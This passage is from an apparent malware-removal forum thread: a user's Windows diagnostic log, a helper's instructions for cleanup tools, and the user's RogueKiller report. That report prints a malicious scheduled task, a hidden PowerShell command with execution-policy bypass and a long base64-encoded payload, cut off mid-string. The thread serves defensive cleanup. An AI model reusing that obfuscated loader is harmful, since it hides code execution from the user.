HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\uefi.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52} => ""="Firmware"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\windows\img0.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "Classic Start Menu"
HKLM\...\StartupApproved\Run: => "Yoga PhoneCompanion"
HKLM\...\StartupApproved\Run: => "Yoga Picks"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "Lenovo App Shop"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "AirDroid 3"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_D61B85333F3CD95B073389B3076505BE"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\StartupApproved\Run: => "OneDrive"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{47BE3932-400F-49D0-983D-B4D7CED199B5}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{2AA3B6D0-E876-458B-BE9E-81C10DE06741}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{CE49CF93-0EC8-404F-9790-90157F4F923A}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [TCP Query User{B1056847-28B0-48DD-9F41-8948B38D2E44}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\astudycachemgr.exe
FirewallRules: [UDP Query User{BB893E07-8667-4F69-BC72-936B06D0CC54}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [TCP Query User{C5B0DE44-2C65-4567-AE9B-1C023CFDCD8D}C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\bin\aviewer.exe
FirewallRules: [UDP Query User{C73A393A-FC2C-46DA-B962-BA7AB67F320C}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [TCP Query User{33A133CD-7086-4E7B-870A-2B14E043A99D}C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe] => (Block) C:\users\007\appdata\locallow\amicas\v6cdviewer\privatejre\bin\armiregistry.exe
FirewallRules: [{516EB7FE-6646-4875-9FBE-33EF828D56EA}] => (Allow) C:\Program Files\CyberLink\PowerDirector10\PDR10.EXE
FirewallRules: [{B765F9AF-C656-4870-8DBF-E1A1610395FC}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismagent.exe
FirewallRules: [{AE3F85E6-7C30-4752-ABE8-1A8A54E50F1A}] => (Allow) C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\ismloader.exe
FirewallRules: [{7B69B2F9-AC3D-4CBD-B736-1A14454C0487}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [{E68E90BB-1E71-4B56-A19F-AFF0749F5A20}] => (Allow) LPort=5556
FirewallRules: [{45BEF83D-8143-48C8-B84E-E557BC50AC22}] => (Allow) LPort=5558
FirewallRules: [{7DBD2BFE-720F-4137-BEEA-BADB6978843F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{414A6F28-8A4C-4426-9508-C8BE1D4D185B}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{5B869AB7-31F0-40C9-876C-5AF444350236}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{EA04E2D7-B327-465A-81F5-6721123D5517}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [TCP Query User{A3359ECA-A83E-41A9-9B8B-77DE98654F79}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [UDP Query User{90C32855-6548-4E45-A1AF-CC4AE6DC4286}C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe] => (Allow) C:\program files (x86)\globalscape\cuteftp 8 professional\ftpte.exe
FirewallRules: [{FECE8818-A771-4FDA-905C-419E61216C65}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{390B1ED0-CE02-4ED4-A6AB-4ED9187286E0}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{5ADCC88B-B82B-4B81-A0A4-8DB21A184AAA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{4678A2EF-F88A-4DE7-83E2-3C868E4F1D01}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{2E06CFC3-8191-483D-9076-8C299A7D7A79}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{5E021D0C-B7B1-447D-9CDD-7FF91B92031D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{BDFB7139-F650-459B-AB9F-BA35F0DBDE99}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [UDP Query User{AABB846D-16B2-4CB4-AE17-7707A831FC40}C:\program files (x86)\airdroid\airdroid.exe] => (Allow) C:\program files (x86)\airdroid\airdroid.exe
FirewallRules: [{BB3DDC02-D438-4562-BA16-342AA5CB6B5A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{49B8014D-F79F-4303-993D-4600006F699B}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{66155D70-C2E6-4DEE-8D29-228F17E9836A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{65D8FD47-7254-4DB8-ACBB-9ACD1D86E8E8}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{EC4EC18B-13C0-458E-BF21-053751AE1308}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{1118C594-EF00-4EBE-AA6D-ECBDE8BBBCB1}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{7059AB57-640C-47F0-AA0A-4A015998E125}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{9D507AF1-1103-4731-92A4-0D4A4E8A2FE9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{0C757126-CD26-4759-9E0B-F8CF62A2B334}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{ABD8F192-50BE-4791-88AC-38C60F6E496D}] => (Allow) C:\Program Files (x86)\VPN Unlimited\vpn-unlimited.exe
FirewallRules: [{4D940F22-3D13-4CEB-8209-043E6C25AF44}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{CC40EEEB-1E6C-4DB9-BB3B-0E47496D03D5}] => (Allow) C:\Program Files (x86)\VPN Unlimited\openvpn.exe
FirewallRules: [{9FFCB36C-A2FB-44C8-BD59-729C5D8E8C87}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{679CC4F7-02A9-44CD-AC16-6858A0499AA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{B58A077D-ACFE-4A10-AC6C-62F5B29BEA7A}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{7603E194-FCBB-42BB-8112-8E5A2C8DB032}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{F192D31A-4726-452D-80E6-FC24D410BC22}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{200C029E-CFF4-4EA4-B1ED-BD183B276F39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/02/2017 10:13:59 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/01/2017 05:37:40 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1203

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1203

Error: (03/01/2017 04:37:54 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/01/2017 02:19:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1140

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 1140

Error: (03/01/2017 06:00:21 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (02/28/2017 06:51:03 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"1".Error in manifest or policy file "UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"2" on line UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0"3.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="15.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="15.0.0.0".
Please use sxstrace.exe for detailed diagnosis.


System errors:
=============
Error: (03/03/2017 04:50:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:50:53 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:50:52 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 04:49:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The BstHdDrv service failed to start due to the following error:
%%2

Error: (03/03/2017 04:48:56 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 03:57:12 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 12:27:33 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/03/2017 12:25:20 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: NT AUTHORITY)
Description: Installation Failure: Windows failed to install the following update with error 0x80073d02: Microsoft Sticky Notes.

Error: (03/03/2017 12:24:35 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable

Error: (03/03/2017 12:24:35 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable


CodeIntegrity:
===================================
Date: 2016-11-28 20:31:52.646
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-11-28 20:31:52.621
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume5\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-09-25 21:36:08.416
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.403
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.392
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.382
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.367
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.358
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.346
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2016-09-25 21:36:08.337
Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume5\Program Files\Microsoft Silverlight\xapauthenticodesip.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4500U CPU @ 1.80GHz
Percentage of memory in use: 37%
Total physical RAM: 8104.27 MB
Available physical RAM: 5097.37 MB
Total Virtual: 11101.28 MB
Available Virtual: 7931.88 MB

==================== Drives ================================

Drive c: (Windows8_OS) (Fixed) (Total:220.47 GB) (Free:3.19 GB) NTFS
Drive d: (LENOVO) (Fixed) (Total:4 GB) (Free:3.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 238.5 GB) (Disk ID: 8061B931)

Partition: GPT.

==================== End of Addition.txt ============================

 

[Broni]

You have a history of starting a topic in this forum and then you abandon it.
Since last time it happened few years ago I'll give you one more chance.
If it happens again you won't be getting any more help from me.

Please, observe following rules:

• Read all of my instructions very carefully. Your mistakes during cleaning process may have very serious consequences, like unbootable computer.
• If you're stuck, or you're not sure about certain step, always ask before doing anything else.
• Please refrain from running any tools, fixes or applying any changes to your computer other than those I suggest.
• Never run more than one scan at a time.
• Keep updating me regarding your computer behavior, good, or bad.
• The cleaning process, once started, has to be completed. Even if your computer appears to act better, it may still be infected. Once the computer is totally clean, I'll certainly let you know.
• If you leave the topic without explanation in the middle of a cleaning process, you may not be eligible to receive any more help in malware removal forum.
• I close my topics if you have not replied in 5 days. If you need more time, simply let me know. If I closed your topic and you need it to be reopened, simply PM me.

========================================

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2

• Close all the running programs
• Double click on downloaded setup.exe file to install the program.
• Click on Start Scan button.
• Click on another Start Scan button.
• Wait until the Status box shows Scan Finished
• Click on Delete.
• Wait until the Status box shows Deleting Finished.
• Click on Report and copy/paste the content of the Notepad into your next reply.
• RKreport.txt could also be found on your desktop.
• If more than one log is produced post all logs.

Please download Malwarebytes to your desktop.

• Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
• Then click Finish.
• Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
• If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
• When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
• Restart your computer when prompted to do so.
• The Scan log is available throughout History ->Application logs. Please post it contents in your next reply.

Please download AdwCleaner by Xplode and save to your Desktop.

• Double click on AdwCleaner.exe to run the tool.
  Vista/Windows 7/8 users right-click and select Run As Administrator
• The tool will start to update the database if one is required.
• Click on the Scan button.
• AdwCleaner will begin...be patient as the scan may take some time to complete.
• After the scan has finished, click on the Logfile button.
• A window will open which lists the logs of your scans.
• Click on the Scan tab.
• Double-click the most recent scan which will be at the top of the list....the log will appear.
• Review the results...see note below
• After reviewing the log, click on the Clean button.
• Press OK when asked to close all programs and follow the onscreen prompts.
• Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
• After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
• To open a Cleaning log, launch AdwareClearer, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
• Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
• A copy of all logfiles are saved to C:\AdwCleaner.

-- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

 

[shivmister]

After running this program there were several items deleted. Also after it finished it became harder to access techspot and to press the download links. It caused a pop up saying I have a virus everytime. I got malwarebytes and the other programs downloaded using incognito mode. I will post the rest of the logs accordingly.

RogueKiller V12.9.9.0 (x64) [Feb 27 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.14393) 64 bits version
Started in : Normal mode
User : 007 [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 03/03/2017 18:50:35 (Duration : 00:23:16)

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 6 ¤¤¤
[PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Deleted
[PUM.Proxy] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\NlaSvc\Parameters\Internet\ManualProxies | (default) : -> Deleted
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo13.msn.com/?pc=LCJB -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3283718265-1983809055-1317204610-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : http://lenovo13.msn.com/?pc=LCJB -> Replaced (http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome)
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{233b3be6-3a13-4215-9df0-79c7b19ef857} | DHCPNameServer : 82.163.143.176 ([GB]) -> Replaced ()
[Adw.DNSUnlocker] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{9ec270b1-c6a4-454b-bfbf-ee40f8d875f6} | DHCPNameServer : 82.163.143.176 ([GB]) -> Replaced ()

¤¤¤ Tasks : 2 ¤¤¤
[Mal.Powershell] \{0D080447-7F09-0979-0F11-050B0F0D110D} -- C:\windows\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAaQBuAGgAbwBvAG0AZQAuAGkAbgBmAG8ALwB1AC8APwBhAD0AUQBXAE4AawBhAG0AbABsAGcAYQAwAFEAWABMADEARgBKAHYARgA4AE8AZgBuADMAOQAxAHAATABJADcAZQBGAEYAXwBhAG0AYgBQADMAVABUAEYAWgBHAE0AWQB3ADcAMgBmAEsAXwBPAEoAUwB2AE0ASgB2AGsANgAtAFUAUQBSAHMAUABsAFQAMQBuAGsAMQBjAHIAVQBpAF8ARQBVAEsAMgBvAGYAVABEADkASQB2AFAAaABWADcAWgBwAFYAUQA5AG4AeABSAFIAMQBBADMAUAB1AHYAawBrAC0AbgA2AHkALQBqAGQAdgBiAFEAbQBZADgAaAB6AFYAeABNAEYAegA2AGoAUwBRAEoASABqAEwATAAzADEAbwBGAEcASQBkAHcATwBqADIAdgAyAG4ATwA4ADMAOQB3AFMAcgBsAHQAagBSAGcAYwBjAHEAUwBzAGMAbQA1ADAAMgB4AFYAMABVAEoAeAA4AHEARwBRAFMAZgBVAEwARAA2AHkATABhAFUAdwA2AEUAaQByADUAYgAwAHMARwB1AGEAOQBZAEgAdQBoAFQAeABEAHAAaABUAHQAeQBKAG4ATwBjAHYASQBTAHoAQwA1AE0ASAAwAFQAegBpAG8ASQBmADkASABZAGQASABpAF8AVgBwADUAawBRAHUAMgA2AGsAOQBEAFAATABtAHcANgBFAG0AeAB2AG0AWgBoADcAbAB3AHIASgBqADYAbgBoAEUASwBKAEoALQAzAC0ASgBXAFEANwB5AGoAVABhAFEARQBRAHUASgBFAGQAWgB3AG0AQgBZAGYAQwBoAHoAWABmAGQATQBwAHQAbQB4AGsAVwBoAGYATAAtAFkAVABSAG0AVwBfAHUAeQBZAG8AYQB4AGoASQBRADgAMAB1AHUARgBPAEEAbwBuAEcAZgAtAHgAMAB0AFoAdgBmAE4A